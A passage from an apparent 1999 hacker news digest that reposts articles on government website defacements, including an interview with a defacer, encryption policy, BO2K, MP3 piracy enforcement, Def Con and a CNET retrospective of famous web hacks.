usually responsible for computer security tasks as well. Yesterday there was speculation that an NSA site was defaced but it turned out to belong to the Navy. Today an NSA server was actually defaced. OSAll spoke with fuqrag, who agreed to a phone interview on the condition that recordings wouldn´t be kept. Why Deface? Fuqrag has, like flipz, gone on something of a defacement rampage in the last few days. Government, military and more servers have fallen to him -- and all after flipz gave him an exploit to use. "Normally I´d stay away from [defacement] -- I haven´t defaced anything for like two years," he told me. His girlfriend, Cristyn, had just broken up with him, and that´s why he started the defacements, he said. "At this point... it´s like what the hell. If Armageddon came tomorrow, that´d be a good thing," he said. "I used to think defacing servers was lame, but now I think it´s fun," he treats it as a way to strike out at a world that´s closing in on him. "I´ve got three pscyhologists who´ll tell you I´m insane..." he said as he explained why he wouldn´t be spending much time in prison. "I think I´ll probably get raided though -- but no matter what, I won´t be spending much time in prison." Targeting the Government According to fuqrag, "I didn´t know it was NSA... But that´s pretty damn cool." He was simply going for "anything with .gov or .mil in the URL," he explained. "I don't hate our country I hate the government. They're always trying to control everything... the greatest freedom we've ever had is the internet and they try to control it," he explained. He has a particular dislike for the Navy because "[his father] was twenty-three years naval intelligence and they really fucked him up." Brushes With the Law Fuqrag has been raided at least once previously for "carding and cell cloning." He was brought to a local FBI field office and interviewed for almost an entire day, at which point he says he was offered a job. "I thought about it for a day or two and told them no." "I was actually really lucky... I had like two million pairs [cell phone cloning information] on zip disks, along with some cells sitting in a drawer." The FBI agents didn´t open the drawer, however, leaving them with no evidence against Fuqrag. Member of gH Fuqrag is also a member of global Hell, a rather famous group who have defaced numerous sites, including the White House Web site. He says he´s "the oldest member of gH, and probably the oldest member they´ll ever have," at 30. gH is, of course, famous for the White House defacement and the numerous FBI raids that followed. More to Follow Flipz, Fuqrag and several others have a "custom exploit flipz wrote" that they´ve been using against the Windows NT boxes. If either one of them gets raided there are plans to post the exploit on the Net "with a message telling every [script] kiddie to start using it." In addition they claim to already have administrator (root on *nix boxes) access to many high profile sites, including Barnes & Noble and Comp USA. Fuqrag also says he´s working on defacing MTV.com. In addition, they say they´re going to start sending a message with their defacements. "We haven´t really said anything," fuqrag explained, "we´re going to start talking." @HWA 33.0 Privacy and Encryption Labeled Antisocial By DOJ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond For some reason this hasn't made much press but it looks like the DOJ considers privacy and encryption antisocial. According to Scott Bradner, an Internet Engineering Task Force area coordinator, someone high up in the DOJ told him that if the IETF was to support encryption it would be an 'antisocial act.' Actually, private property is antisocial. Under socialism, there is no private property. Ayn Rand said in The Fountainhead "Civilization is the progress toward a society of privacy." Wired - It is buried on the second page http://www.wired.com/news/politics/0,1283,31937,00.html How MS' Junket Paid Off by Declan McCullagh 3:00 a.m. 16.Oct.1999 PDT WASHINGTON -- When Microsoft invited free-market allies to its campus last month, its PR flacks billed the all-expense-paid junket as an information-sharing session. But some critics aren't so sure. Just after attendees got home, they fired off a letter to Congress suggesting that the budget of the Justice Department's antitrust division should be pared down a little. Or, perhaps, maybe a lot. Now, it's fair to say that groups like Citizens for a Sound Economy, Citizens Against Government Waste, and the National Taxpayers Union are hardly fans of aggressive antitrust enforcement, and -- if they had gotten around to it -- would have sent the letter on general principles. But it's probably also true that getting fat checks from Microsoft provided an additional incentive to make some time. No matter, says Al Foer, president of the American Antitrust Institute, who calls it coercion. "With negotiations reportedly under way to resolve the government's case, Microsoft's salvo is clearly an attempt to leverage its position through intimidation.... This lobbying effort is part of a longer-range strategy to keep the government from applying the Sherman Act to the high technology industry of the future -- which Microsoft hopes to continue to dominate," he said in an email message Friday. Meanwhile, Microsoft hasn't been idle. "Microsoft called us today and wanted us to start writing letters to the Hill," said a source close to one group that receives funds from MS. "Nobody was quite sure what that would accomplish." YEAH, GOOD LUCK: Lisa Dean has an unlikely goal: To persuade her fellow conservatives to abandon their long-standing quest to rid the Net of anything that might make your grandmother blush. As vice president of Paul Weyrich's Free Congress Foundation, Dean has recently been busy opposing a bill requiring federally funded libraries and schools to install filtering software. The bill, championed by Ernest Istook (R-Oklahoma), is part of a juvenile justice bill that Congress is in the final stages of considering. "I'm trying to get conservatives to see what Istook is doing is a precedent for giving Washington control. Then someone else comes in later and says we've got to filter gun sites. Then the tobacco industry gets filtered and then comes fast foods," Dean says. "That's the attitude of the right. As long as they get rid of pornography that's all they care about." UNCERTAIN ALLY: When the White House hired law prof Peter Swire this spring, top officials proclaimed him to be the administration's chief privacy czar, and assured civil libertarians that Swire would be their inside ally. But that hasn't turned out to be the case. Instead, Swire has made a point of defending the Clinton administration's privacy misdeeds. "Their MO is to send out their privacy guy Swire," complains one disgruntled privacy advocate. Swire was scheduled to testify for the administration at a House committee hearing on Thursday, but it was postponed until November. The topic: FidNet, the controversial plan that would include ongoing government surveillance of the Internet. TRADEMARK TUSSLE: Law professors are urging the US House of Representatives to delay voting next Tuesday on the Trademark Cyberpiracy Prevention Act. In a letter sent to Speaker Dennis Hastert late Friday, they said the bill unfairly expands the rights of trademark owners far beyond any given under existing law, and benefits corporations at the expense of individuals. Signers include Harvard University's Lawrence Lessig, Georgetown University's Julie Cohen, and University of Miami's Michael Froomkin. PRIVACY IS AN "ANTISOCIAL ACT": Scott Bradner wasn't surprised to hear the FBI say this week that they wanted an easily wiretappable Internet. The veteran Internet Engineering Task Force area coordinator and Harvard University networking guru has already had his arm twisted by the Feds. It happened when the IETF decided to wire encryption into the next-generation Internet protocol, IPv6. "Someone very high up in the US Justice Department told me that week that for the IETF to support encryption was an 'antisocial act,'" Bradner said. TELL US WHAT YOU REALLY THINK: Debate is getting snarly on a mailing list the IETF created to debate whether the Net should be tappable for the Feds -- or, for that matter, non-US police too. So far, support for the scheme seems to be coming mostly from telephone companies. "Can we just write the preface that says this is a useless disgusting, repugnant thing, but if we need to do it, this is how we do it, and get on with doing it?" wrote one engineer. Big mistake. Soon libertarians were flaming him and his allies mercilessly. "I'd like to step back one step from the technical discussions of which variant of Zyklon B is most effective, to discuss the question of whether this is a good idea anyway," wrote longtime cypherpunk Adam Back, making a reference to the poisonous gas used by the Nazis. Back's solution: A no-cooperation approach. BEWARE TECHNOCRATS: What's the only thing worse than having US government bureaucrats dictate Internet standards? Answer: Having international government bureaucrats do it. That's what the International Telecommunications Union, a paragon of byzantine bureaucracy, is planning. Yoshio Itsumi, secretary general of ITU, said at the Telecom 99 forum in Geneva that he was itching to get into the job of influencing standards like domain name administration. One longtime ITU critic sent us a four-point criticism of the plan. In interests of brevity, here's point Numero Uno: "They did everything possible to prevent [the Internet from] coming into existence - ranging from banning private international user networks, preventing the lease of private circuits for Internet use [and when that began to fail, jack up prices so high it had the same effect], promulgating alternative standards that were mandated for use rather than Internet standards, promulgating alternative services, funding alternative implementations, and basically bad-mouthing and banning the Internet from their forums and dialogue." Hey, if you think that's dense, be glad we didn't include points two through four. GOP.gov: Last week we told you about Republican Conference Chairman J.C. Watt's candid "they-suck" appraisal of his colleagues Web sites. Now he's decided to do something about it. A project under development called "GOP.gov" will let party loyalists craft their own myGOP.gov home page where they can receive the latest Republican info on both local and national topics. The forthcoming Web site will replace hillsource.house.gov. The plan is for much of the news to be provided by GOP House press secretaries. @HWA 34.0 B02K Reviewed By WinNT Magazine ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Windows NT Magazine has published an extensive review of BO2K. WinNT Mag says that the open source code, its ability to remote admin systems, and its encryption features are all good but derides the product for not having logging capabilities. (It is good to finally seeing BO2K taken seriously) Windows NT Magazine - Subscription required http://www.winntmag.com/Articles/Print.cfm?Action=Print&ArticleID=7254 BO2K - They are having connection issues at the moment http://www.bo2k.com @HWA 35.0 MP3 Pirates Beware ~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The International Federation of the Phonographic Industry (IFPI) has launched a major crack down on internet MP3 pirates. Targeting hundreds of sites in over 20 countries the IFPI hopes to remove over 1 million pirated songs from the internet. (This will do nothing but drive them further underground. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2383311,00.html?chkpt=zdnntop -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Music execs threaten to kill MP3 sites By Reuters October 28, 1999 5:21 AM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2383311,00.html LONDON -- The global music industry on Thursday outlined plans for a coordinated attack on Internet piracy, taking action against hundreds of outlaw sites in more than 20 countries. The International Federation of the Phonographic Industry (IFPI) said its strategy was aimed at paving the way for artists and record companies to deliver music electronically and legally around the world. A global anti-piracy operation The group's legal initiatives comprise moves to close illegal sites and delete unauthorized files in countries around the globe from Japan to the United States, Argentina, South Africa and Europe. "Today's enforcement campaign by IFPI shows that where Internet pirates are persistently breaking the law, there is now a global anti-piracy operation which will stop them," said IFPI Chairman Jay Berman. However, the IFPI said there was an urgent need to introduce copyright legislation worldwide specifically to protect against online piracy. The IFPI estimates there are some 1 million illegal music files posted on the Internet. The group's campaign targets two groups: people who are uploading material on to the Internet, mainly in the MP3 format, and Internet Service Providers who may be hosting illegal Web sites. @HWA 36.0 Red Herring Reviews Defcon ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Tan It is a little late but Red Herring Magazine has a review of this years Defcon. They take an interesting view on the changing face of the underground. Red Herring http://www.redherring.com/mag/issue71/news-security.html Security Hackers go corporate By Niall McKay Red Herring magazine From the October 1999 issue Mockery is catching. This year's Def Con hackers' conference had all the corporate professionalism of a mainstream computer industry event. And the more the hackers strove to subvert their commercial adversaries, the more they became like the company they love to hate: Microsoft (Nasdaq: MSFT). In July Las Vegas was crammed with hackers, crackers, self-proclaimed security experts, "script kiddies" (novices), and "scene whores" (groupies). High-profile groups gave ritzy, hour-long presentations on their software tools, a PR agency pampered journalists in the pressroom, and hacking supergroups like the Lopht and the Cult of the Dead Cow hawked $20 T-shirts. The star of the conference, the Cult, launched its hacking product Back Orifice 2000 (a vulgar homage to Microsoft's BackOffice suite) in a slick demo complete with electronic music and video presentations. Back Orifice is not a hacking program, the Cult said, just a remote-administration tool. In fact, it is a so-called Trojan horse program that, once downloaded, can give a hacker complete access to any machine on a network. "Back Orifice is just a tool, like a hammer," said its author, who goes by the nickname of DilDog. The smooth professionalism of Def Con '99 is just a sign of the changing times. As the world embraces electronic commerce and as security issues become paramount, sections of the hacker community are pushing to legitimize themselves. Over the years, the Lopht has obtained an air of respectability. It is a registered corporation, does consulting work for security companies like Counterpane Systems, and has even testified before the U.S. Senate on the security of government data. But hackers' relationship with law enforcement remains an uneasy one. Officials from the Federal Bureau of Investigation and the National Security Agency attended but risked being picked out of the audience in Def Con's traditional "Spot the Fed" contest. And Brian Martin, a self-professed "ex-hacker" better known as Jericho, teaches a Hacker Tracker course to FBI and NSA officials even though he's under investigation for defacing the front page of the New York Times online edition -- a charge he denies. ("But they still need serious help," he says.) So where is hacking headed next? Rumor has it that venture capitalists are on the prowl for investment-worthy hacker -- er, security -- startups. @HWA 37.0 Hong Kong to Create Government Gateway ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond The Director of Information Technology Services for Hong Kong, Lau Kam-hung, said that they will strengthen security by establishing the Secure Central Internet Gateway (SCIG). This Gateway will enable government bureaus and departments to securely access the internet. It will include firewalls, virus detection systems and proactive intrusion detection systems. Asia Pulse http://library.northernlight.com/FD19991026820000180.html?cb=0&dx=1006&sc=0#doc Story Filed: Tuesday, October 26, 1999 10:52 PM EST HONG KONG, Oct 27, 1999 (Asia Pulse via COMTEX) -- Promoting the awareness of Internet-related data protection is an important goal of the Government, the Director of Information Technology Services, Mr Lau Kam-hung, said Tuesday. Speaking at a seminar on the protection of data on the Internet today, Mr Lau said that personal data on the Internet were vulnerable if they were not properly protected. "White-collar criminals have taken advantage of the new business opportunities brought by the rapid development and wide adoption of Internet technology to commit crimes," Mr Lau said. "Hackers and crackers are no strangers to us," he said. There had been 102 cases of hacking reported to the Police in the first seven months of 1999, compared with 13 cases in the whole of 1998. In order to keep its own information infrastructure secure, government bureaux and departments follow a set of security guidelines to protect their information technology (IT) resources. Mr Lau said: "We will strengthen the security by establishing the Secure Central Internet Gateway (SCIG) to enable government bureaux and departments to gain access to the Internet, to disseminate information and to communicate with the public over the Internet through a secure and centrally managed gateway." "The SCIG, to be set up early next year, will adopt internationally accepted Internet security standards, and will protect government bureaux and departments by means of firewalls, virus detection systems and proactive intrusion detection systems," he added. Mr Lau also pointed out that the "Digital 21" IT Strategy had laid down several initiatives to facilitate the conduct of business and other transactions securely on the Internet. Meanwhile, the Government is working towards the development of a Public Key Infrastructure (PKI) to provide a framework for authenticating the identity of participants performing electronic transactions in Hong Kong. The PKI will not only allow government services to be delivered securely over the public networks, it will also lay a foundation for the delivery of electronic services of other organisations. "To protect consumer interests and enhance users' confidence in electronic transactions, my department is going to set up a Certification Authority Recognition Office by the end of the year," Mr Lau said. He noted that Certification Authorities (CAs) were free to apply for recognition on a voluntary basis, but only those CAs which had achieved a trust standard and adopted a common and open interface in their operation would be recognised. The Government also introduced the Electronic Transactions Bill into the Legislative Council in July this year, to provide the necessary legal framework for the conduct of electronic transactions in Hong Kong. (Hong Kong Government Information Service.) ASIA PULSE Copyright © 1999 Asia Pulse Pte Ltd @HWA 38.0 .mil and .gov Defacements on the Increase ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Ender Wiggin If you haven't been paying attention recently the number of government and military web sites that have been defaced has increased dramatically over the last few days. They have been twelve such defacements in the last 24 hours including the second defacement of US Army Reserve Command. Attrition Mirror http://www.attrition.org/mirror Fuqrag, the guy who defaced a server hosted at Fort Meade (headquarters of NSA) has granted an interview with OSALL. Fuqraq Interview - via OSALL (see elsewhere this issue) 39.0 CNet Chooses Top Ten 'Hacks' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Sarcastro CNET.com did a feature report on the top 10 greatest hacks of all time, of course by 'Hack' they mean some sort of illegal activity. Somehow the Morris Worm only made number 10 and they completely missed the Chinese Human Rights defacement. Not to mention that this is more of a cheap stunt to get advertising revenue by placing each of the ten on its own separate page. So to save you the aggravation here are the top five that they chose, 5. InterNic redirection to AlterNic, 4. Air Tran defacement, 3 New York Times Defacement, 2.Drudge Report Defacement, 1. War Games the movie (How did that get there?) Anyway unless your bored this morning don't bother reading this. C | Net http://home.cnet.com/specialreports/0-6014-7-1420567.html?tag=st.cn.1fd2. tlpg.6014-7-1420567 A CNET Special Report By Matt Lake (10/27/99) Hackers. You can't even use the word without ticking someone off. Upholders of the status quo hate that the existing state of affairs is being undermined by sociopathic cybervandals. Old-school hackers think of their work as exploratory and prefer to call people who break into servers for mischief crackers. But it's those mischief makers who get attention. Their hacks make the front pages of world newspapers and cause fear and hysteria. Among these types of hacks, there are gradations of severity. Some hacks pose a threat to national security; some hacks are merely an annoying form of political activism. For this retrospective, we selected some of the most creative, subversive work by these Web "hacktivists." You'll find examples of mischief dating from the early days of computing to the latest antiestablishment outbursts. Rather than trying to cause any serious trouble, many of the nouveau crackers we selected like to target Web sites they oppose for political reasons, such as those of big government, business, or organizations whose political views are at loggerheads with their own. This breed of hacktivists raises a smile from many who share their beliefs, even if their methods seem a little extreme. One name you won't see here is that of hacker poster boy Kevin Mitnick, who was indicted on 17 counts of computer fraud, wire fraud, damage, and unauthorized access. The hacks he got caught for weren't merely public displays of bravado; they were more like industrial espionage. Of course, we don't endorse hacking of any kind. But it's an integral part of Web culture, and like anybody else, we love a sensational story. So read on for our favorite hacks of all time. It's 1988. Robert Tappan Morris, the 22-year-old son of a security expert for the National Security Agency and a bit of a geek in his own right, decides to write a benign program to map every server on the Internet. Trouble is, he's not that careful a programmer. Check Your Math His program, now known as the Worm, was supposed to hop between servers on the Internet, copy itself onto each server, and move on. However, a misplaced decimal point in the code made the Worm copy itself not once but indefinitely on each server. More than 6,000 servers crashed--one out of every ten servers on the Internet at the time. It took a full day to get the Net back online, by which time network administrators wanted blood. That's how Morris ended up being sentenced to three years of probation, 400 hours of community service, and a $10,000 fine. His defense attorneys argued that the accident had not actually deleted files on any of the servers, but that was considered small comfort considering the lost hours of service and the cost in administrator time to fix the problem. Stupidity or Conspiracy? Indeed, many considered his punishment suspiciously lenient. Conspiracy theorists thought that Morris was just a front man covering for the real perpetrators: his dad's NSA cronies. And so, for the underground tech community, the great Worm attack of 1988 was a twofold blessing: It showed how defenseless Net servers were, and it pointed a suspicious finger at the community's enemy, the government. The hacker community widely reviled the 1995 movie Hackers as being totally unrealistic. Hard Copy So it was hardly a surprise when the movie's site got hacked and the perpetrators replaced glowing Hollywood-style promo copy with a scathing parody of a movie review: Dade is a half-wit actor who's trying to fit in to his new role. When a seriously righteous hacker uncovers MGM/UA's plot to steal millions of dollars, Dade and his fellow throwbacks of thespianism...must face off against hordes of hackers....all with the aid of his Visa card. Want its number? What was surprising was that MGM/UA kept the hacked site live, where it remains to this day. The studio also posted a letter from the hacker, which read, "I would like to offer an apology for my actions of last night. There was no malice intended, I just got carried away. I understand you may not appreciate the humor of my message; I agree, it was in poor taste and went entirely too far." The message was so odd for a supposed subversive hacker that some wondered if the studio itself had been behind the hacking. Jurassic Hack The same question came up the next time a movie Web site was attacked. Jurassic Park: The Lost World's site was hacked shortly before the movie's release. CNN and CNET News.com posted the news of a benign hack, which replaced the movie's trademark tyrannosaurus with a duck and the legend "Duck World, Jurassic Pond." Within 24 hours, a different story was out: online zine Beta pointed out that the duck was a professionally rendered and functioning image map with a time stamp two days earlier than the original Lost World graphic. The report concluded that "this was a publicity stunt and it's pathetic." (The following day, Beta toned down its original message.) Chances are, we'll never know for sure if these hacks were real. But the incidents demonstrated that hacks had become a reliable way to make the news--so reliable that commercial ventures might begin to co-opt hackers' methods for publicity stunts. In 1996, the biggest social issue in the online community was the Computer Decency Act (CDA), an effort by the United States government to control Internet content considered harmful to minors, specifically pornography. Most of the Net community thought that the CDA veered into censorship and was impossible to enforce, but only a dedicated few had the gall to mess with the United States Department of Justice's Web site to protest the law. Legalese Becomes Hackspeak The screed posted on the DOJ Web site in the early morning of Saturday, August 17, 1996, was discovered by system administrators within hours--but it took them two days to fix the site and restore it. Meanwhile, visitors were treated to a supremely lengthy, often boring, sometimes inspired parody of the DOJ's legalese statements about the CDA, including the page title "U.S. (Japan's) Department of Injustice" and a lot of sophomoric humor. For example: SEC. 502. OBSCENE OR HARASSING USE OF TELECOMMUNICATIONS FACILITIES UNDER THE COMMUNICATIONS ACT OF 1934. Section 223 (47 U.S.C. 223) is amended--(iii) any usage of the word "bunny-rabbit" shall result in a flogging of great magnitude. If usage of the word "bunny-rabbit" exceeds that of forty-two, then the defendant will be found guilty of heresy and sentenced to [punishments including]...forced coding in Basic. On the whole, though, the hack came off as puerile rather than witty. It did reflect the Net community's intense opposition to the CDA, which was eventually overturned by the Supreme Court. While some hackers are interested mostly in crowing about their technical prowess, others merely have strong opinions. Virtual Red Paint Take, for example, the Ghost Shirt Society. This group of hackers attacked Kriegsman Furs and Outerwear in November 1996. Kriegsman, an established luxury clothier, showed a full-length, white fox fur coat on its opening page, with the slogan "Our materials and design are steeped in tradition and alive with style." The animal rights hacktivists changed that front page to show a monochrome picture of a similar fur coat daubed in red and the words "fur is dead." Like PETA activists who chuck red paint over customers as they leave furriers, the Ghost Shirt Society thought of themselves as educative rather than antagonistic. On the hacked page, they left links to sites dedicated to the rights of our four-footed friends, including Envirolink.org's Animal Rights FAQ and the American Anti-Vivisection Society. A Most Moderate Radical And in a rare case of restraint, they didn't brag about how they "owned" the site's administrators--a typical hacker boast. In fact, the opening paragraph of their revised front page was a sympathetic and considerate apology to the technical staff: I did not hack this site in order to cause trouble for anyone (except maybe Kriegsman Inc.). I fully understand the responsiblities of a system administrator and understand it is a thankless job. This is in no way the administrator's fault (or whoever is in control of security at ShopTheNet). I tried to do this as carefully as I could, in order not to cause any problems for the site administrator(s). Anyway, this was done in the name of animal rights. Even leather-clad, carnivorous fur fiends couldn't help but notice this moderate tone, though it was placed next to pictures of several cute baby animals with the sentence "This is what fur looks like before the gassing, clubbing, and electrocution." While no one was ever apprehended for this misdeed, the Kriegsman Furs hack will go down in history. Instead of claiming the usual motivations, such as self-aggrandizement, mischief, or the defense of some vague doctrine about digital freedom, these hackers led the way to hacking as a form of nonviolent political opposition. Spoofing is the interception and jumbling of information from a content-providing Web server before it reaches a person browsing the site. This type of content manipulation, very popular in 1997, is relatively benign in that it doesn't actually affect the original server--and it's often very funny. Interactive Hacking Two of the best examples, in our opinion, were smeG and MetaHTML's Zippy server. In both cases, visitors were willing participants in the spoof. To start the fun, surfers would enter the URL of any site they wanted spoofed into a form at the spoofing site. The smeG server intercepted the content coming off a Web server and turned it into a mirror image of itself--with words, images, and layout all reversed. This made for some very perplexed surfers. Harmless Gibberish The Zippy server inserted random quotes from Bill Griffith's aphasic cartoon character into the text of a page. At first glance, the spoofed sites seemed perfectly normal. But as this Zippified extract from the White House's site shows, they weren't: Tipper Gore is the wife of Vice President Al Gore. I feel real SOPHISTICATED being in FRANCE! She is a well-known child advocate and actively involved with issues relating to mental health and homelessness. How do you explain Wayne Newton's POWER over millions? It's th'moustache&have you noticed th'way it radiates SINCERITY, HONESTY & WARMTH? It's a moustache you want to take home and introduce to Nancy Sinatra! To participate in the mayhem yourself, pay a visit to the MetaHTMLsite and enter your favorite URL. http://www.metahtml.com/apps/zippy/welcome.mhtml When Network Solutions (also known as InterNIC) began charging $100 to register domain names in 1995, the company didn't make many friends among Web aficionados. Up until then, registering and maintaining domain names was free, and people objected to the fact that one company controlled so much Web real estate. There were a few alternatives to the InterNIC, one of which was AlterNIC, the brainchild of archhacker Eugene Kashpureff. AlterNIC offered a different way to register domains, but since InterNIC had a lock on .com domains, AlterNIC used alternatives, such as .ltd and .sex. Please Use Alternate Route In July 1997, Kashpureff used his knowledge of the domain name system (DNS) to divert traffic from Network Solutions. For one whole day, people who entered www.internic.net into their browsers found themselves not at the official domain registry but at AlterNIC. Kashpureff dubbed this maneuver Operation DNS Storm, and many applauded him for pulling it off. It was also illegal, and unlike most hacker/crackers, Kashpureff had left his fingerprints all over it by sending DNS traffic to his own domain. Sensing he was in trouble, Kashpureff fled his native Washington for Canada to escape the law. Eventually, however, he was arrested, arraigned, and found guilty of one count of computer fraud the following year. As for the battle over domain names, it's still raging, and AlterNIC, now overseen by Kashpureff's partner, is still providing an alternative. Earlier this decade, several of ValuJet Airlines' planes crashed because of poorly maintained equipment. To separate itself from a name that had become synonymous with air disaster, the company became AirTran in 1997. Under the banner headline "The Making of a New Airline," the company's Web site prominently featured a press release announcing the changes. It'll Take More Than a Name Change But the announcement only attracted hackers, who quickly attacked the site and littered the pages with sick, locker-room humor. The proud banner headline was replaced with "So we killed a few people. Big deal." The press release was similarly edited: ATLANTA, Sept. 24, 1997--ValuJet Airlines today changed its name to AirTran Airlines and along with its merger partner AirTran Airways introduced a new business strategy designed to bring dismemberment to a broader travel audience. The airline said that its objective is to make air travel more attractive to business travelers and even more convenient for suicidal maniacs. "Over the past year we've renewed our focus on the basics of our business with safety, reliability and operational excellence as our goal," lied Corr, who joined the carrier in November 1996... "AirTran's mission is to kill air travel customers who can actually afford to die. It's that simple." The parody dipped into even more crass humor than these examples (if you can believe that). Sick Jokes Will Prevail AirTran promptly removed the hacked page, and the hackers were never caught. They did, however, send a copy of the page to 2600 Magazine for posterity. And the moral of the story is that no matter the medium, when it comes to mass tragedy, it's only a matter of time before the sick jokes start. The New York Times is not a popular newspaper among hackers. The main reason is that Times writer John Markoff brought national attention to Kevin Mitnick's story--even cowriting the book Takedown with security expert Tsutomu Shimomura, who led the team that eventually nabbed Mitnick. Don't Mess With Our Hero A group calling themselves HFG (Hacking for Girliez) decided to engineer their own takedown. On September 13, 1998, the main page of the New York Times's site was replaced by an eccentric diatribe that attacked John Markoff and another writer working on a book about hackers. To the average person, this hack looked like gibberish, littered with mostly uppercase phrases like "TH1Z 0N3 IS F0R Y3W." Those able to decipher the hack could read that HFG was concerned not just with raising consciousness in support of Mitnick, but also with grandstanding about its own hacks. The hackers wrote of their own "rooting" exploits (that is, hacking the root directory of a server) at sites including those of Penthouse, Motorola, and an ISP in New Mexico. And those who made it to the end of the page found a statement that more interesting material could be found in the HTML source of the hack. And by the Way, Here's Our Manifesto Sure enough, the source contained comments in conventional spelling and capitalization, detailing HFG's beliefs and exploits and quoting liberally to bolster its position, as with this quote from G.K. Chesterton: "A good joke is the one ultimate and sacred thing which cannot be criticized. Our relations with a good joke are direct and even divine relations." In the end, the New York Times fixed its site, and the perpetrators got away, proving that even the most venerable of newspapers is no match for cybervandals with a grudge. Hackers live for the opportunity to promote themselves. They love grandstanding. Some might say that they have a lot in common with Internet gossip columnist Matt Drudge. Same Look and Feel So it wasn't surprising when a group calling themselves United Loan Gunmen took a jab at the root directory of the Drudge Report on September 13, 1999. Except for a change to the site's banner--the title was changed to ULG Report--the front page maintained the spartan, almost graphic-free look of the regular Drudge Report. The difference was in the headlines: the big banner read "United Loan Gunmen take control of Mike (sic) Drudge's data stockyard to once again show the world that this is the realm of the hacker." The top few headlines covered hacker issues, such as "Kevin Mitnick still in jail" and "2600 Magazine continues to get worse over the last year, and the Web page is still crappy to boot." A Little Goes a Long Way But except for those few changes, the site remained pretty much the same, with the site's search engine and links to Matt Drudge's regular column and archives still functioning. This may have been because the hack was a rush job, but it is noted in 2600 Magazine's Hacked Sites archive as a good example of a "less is more" hack. Once the smoke cleared, Drudge regained control of his root directory, and the unidentified hackers presumably went on to bigger and better hacks. As for the moral of the story, well, maybe just that Drudge got a taste of his own medicine. A single hack launched an amazing career for "David Lightman," the teenage identity assumed by a 21-year-old man in the early 1980s. David began his hacking career by adjusting school grades on a high school computer, then went looking around for more challenging fare. Taking on the Pentagon He found it by accidentally logging on to a Department of Defense computer and initiating a program there called Global Thermonuclear War. Unbeknown to him, this actually gave him complete control over the U.S. nuclear arsenal. In his enthusiasm to explore the limits of the program, he threatened then-Soviet Russia to a nuclear standoff--and brought the world to the brink of destruction. Thankfully, disaster was averted, and David became quite a celebrity as a result. He began rubbing shoulders with Hollywood's glitterati, such as Michelle Pfeiffer, Jennifer Jason Leigh, and Meg Ryan. He also buddied up to Marlon Brando, Jim Carrey, George Segal, and James Earl Jones. Plays a Hacker on TV David Lightman's real name is Matthew Broderick, of course, and the role he played in 1983's WarGames was pure fantasy. Real-world hackers--despite their posturing, bluster, talents, and occasional good intentions--couldn't hope to get within a thousand yards of Meg Ryan. The closest they can aspire to is hacking the Internet Movie Database. But the social life of hackers aside, Lightman's make-believe hack is what catapulted hacking into the public consciousness and gave us the idea that hackers can take control of fundamental systems, such as the Department of Defense computers or the electrical grid. Hackers like to foster such misconceptions, but in reality, no one's ever come close to the computers that control the nuclear arsenal or any such system. And let's just hope no one ever does. @HWA 40.0 MSNBC Special Report ~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by UNREAL An MSNBC Special report entitled "Internet underground" Really isn't all that special. They have gathered together a lot of old content and repackaged it under a new heading and then called it a special report. Unless you have been living in a cave the last six months I wouldn't bother. (Actually this may be months old, first time I have seen it.) MSNBC http://archive.msnbc.com/modules/hacking/default.asp Step warily into the Internet Underground, home to sex traders, scam artists, hackers and “crackers,” and a place where you had best watch your back and keep an eye on your kids. SEX The seedier side of the net's underbelly... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Mike Brunker MSNBC June 2 — Demonstrating the adaptability that helped earn it the title of “world’s oldest profession,” prostitution is thriving on the Internet, slipping into comfortable new guises like sex-for-money chatrooms and Web sites showcasing fancy call girls and boys. But with the continued expansion of the online sex trade, and the appearance of numerous civilian vigilante groups determined to halt its spread, pressure is building to rein in the hustlers and hookers of cyberspace. THE USE of the Internet to advertise prostitution has received far less attention from law enforcement, politicians and the media than its notorious cousin, online pornography. But workers on the front lines of cybercrime say it is a growing concern, particularly when it involves minors selling their bodies to the highest bidder in chatrooms. Crusaders like Pete Hampton, a former lawman who established the Web Police to serve as an online clearing house for complaints of online criminal activity, say that when they attempt to bring prostitution cases to the attention of authorities, they are often met with indifference. “We find very few will even touch it,” Hampton said. A DIFFICULT ISSUE “It’s hard to bring this issue to an investigative agency’s attention,” agreed Linda Fairstein, chief of the sex crimes prosecution unit of the Manhattan District Attorney’s Office. “...Government resources, especially with local police agencies, don’t begin to compare with what what Web-literate people can do in terms of crime, prostitution in many ways being the least of it.” Federal authorities, however, insist that they have quietly been pursuing the most serious cases for some time. Peter Gulotta, head of the FBI’s Innocent Images task force in Baltimore, told MSNBC that the bureau is currently pursuing several cases involving online prostitution rings that extend across state lines, a prerequisite for federal involvement. Similar cases have been brought in Dallas, Miami and Boston over the past several years, he said. Federal cases have almost exclusively focused on cases involving children, but local authorities are beginning to demonstrate a limited interest in virtual vice. Police in Florida, Nebraska and New Jersey have in recent months busted at least five online “escort” services that allegedly were providing sex for money. Only one involved minors: A case in Palm Beach County, Fla., in which 27-year-old Jay Ryan Quinn stands accused of prostituting underage runaway girls through his Web site. Though there are no numbers to quantify the prevalence of prostitution operations on the Internet, as neither the federal government nor the states keep track of such cases. But Hampton, of the Web Police, says he and his staff receive an average of 50 to 75 reports of prostitution each week out of a total of 1,500 complaints. Echoing the complaints of police departments around the world, Hampton says he and his staff engage in triage to focus on the most important cases — those involving children. "We have to prioritize,” he said. “... If this is simply a matter of a call girl service or an individual female advertising her services on the Internet, and she’s of legal age of consent, this is not a priority case. If this is someone advertising child prostitution or selling children on the Internet, it does become a priority case.” A 